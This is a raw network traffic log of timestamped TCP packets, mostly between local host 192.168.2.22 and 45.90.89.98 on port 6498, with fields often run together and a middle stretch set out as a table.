                                                                                                                                                                        Oct 23, 2024 17:27:24.174890041 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174911022 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175192118 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175234079 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175270081 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175354004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175395012 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175409079 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175424099 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175461054 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175806046 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175818920 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175857067 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175889969 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175901890 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175914049 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175946951 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.177416086 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.266617060 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.266633987 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.266680956 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293127060 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293143988 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293152094 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293174028 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293185949 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293193102 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293220997 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293505907 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293515921 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293548107 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293661118 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293744087 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293756962 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293781042 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293864012 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293876886 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293888092 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293899059 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293929100 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.294610023 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.294655085 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.294665098 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.294692993 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.294744968 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.295876026 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.375114918 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.375238895 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:27:24.384659052 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.384911060 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.384958029 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.428817034 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.428900957 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.428915024 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.428926945 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.428950071 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.428992033 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.429034948 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429063082 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429097891 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.429263115 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429339886 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429352999 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429382086 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.429496050 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429507017 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429518938 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.429542065 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.430211067 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.430257082 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.430257082 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.430268049 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.430301905 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.431345940 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.503232002 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.503443956 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.503494978 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.530622005 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.530649900 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.530661106 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.530694008 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.547636986 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.547669888 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.547683954 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.547700882 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.547745943 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.547780991 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.547794104 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.547831059 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.547955036 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548017025 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548029900 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548054934 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.548144102 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548156977 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548185110 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.548701048 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548743010 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.548753023 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548765898 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.548798084 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.548825026 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.648976088 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.649003983 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.649015903 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.649041891 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.649069071 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.666281939 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666332006 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666344881 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666376114 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.666419983 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666466951 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.666500092 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666589975 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666600943 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.666611910 CEST64984917545.90.89.98192.168.2.22
Timestamp                              Source Port  Dest Port  Source IP      Dest IP
Oct 23, 2024 17:27:24.666627884 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.666652918 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.666738987 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667253971 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667299032 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.667301893 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667323112 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667359114 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.667471886 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667484045 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667495012 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.667519093 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.668133020 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.668173075 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.668203115 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.668943882 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.767600060 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.767642975 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.767656088 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.767724037 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.784934998 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.784970045 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.784981966 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785011053 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.785043955 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.785376072 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785417080 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785430908 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785455942 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.785588980 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785603046 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785626888 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.785805941 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785820007 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785844088 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.785912991 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.785950899 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.786166906 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.786216974 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.786230087 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.786242962 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.786254883 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.786277056 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.786395073 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.787940025 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.828733921 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.828782082 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.828788996 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.828943968 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.886435032 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.886446953 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.886466026 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.886496067 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.903613091 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903645039 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903657913 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903691053 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.903726101 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903793097 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903800011 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.903836966 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.903862000 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.904299974 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.904349089 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.904360056 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.904387951 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.904458046 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905040026 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905056000 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905067921 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905138016 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.905190945 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905200005 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.905239105 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:24.947550058 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.947748899 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.947757959 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:24.947860003 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.005076885 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.005088091 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.005100965 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.005171061 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.022166014 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022213936 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022221088 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022283077 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.022305012 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022336006 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022412062 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.022483110 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022578001 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022584915 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.022646904 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.022648096 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023063898 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023108006 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023113966 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023143053 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.023268938 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.023403883 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023475885 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023484945 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023524046 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.023617983 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023624897 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.023708105 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.025052071 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.066293955 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.066308022 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.066322088 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.066472054 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.123610020 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.123644114 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.123650074 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.123714924 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.123832941 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.140743971 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.140789032 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.140794992 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.140882015 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.140918016 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.140961885 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.140969992 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141076088 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.141077995 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141087055 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141557932 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141683102 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141695023 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141700983 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.141802073 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.141817093 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141827106 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.141861916 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.142087936 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142100096 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142131090 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.142175913 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142183065 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142195940 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142319918 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.142769098 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142776012 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.142889023 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.184941053 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.184957027 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.184966087 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.184973001 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.185018063 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.185122967 CEST   49175        6498       192.168.2.22   45.90.89.98
Oct 23, 2024 17:27:25.242561102 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.242573977 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.242588043 CEST   6498         49175      45.90.89.98    192.168.2.22
Oct 23, 2024 17:27:25.242638111 CEST   49175        6498       192.168.2.22   45.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.259736061 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259744883 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259752989 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259809971 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.259824991 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259833097 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259845018 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259851933 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.259905100 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.260040998 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260320902 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.260333061 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260339022 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260389090 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.260495901 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260577917 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260582924 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260776997 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260783911 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260807991 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.260889053 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260895967 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260906935 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260914087 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.260936022 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.260936975 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.262451887 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.301259995 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.301290989 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.301357031 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.303932905 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.303988934 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.303994894 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.304280996 CEST491756498192.168.2.2245.90.89.98
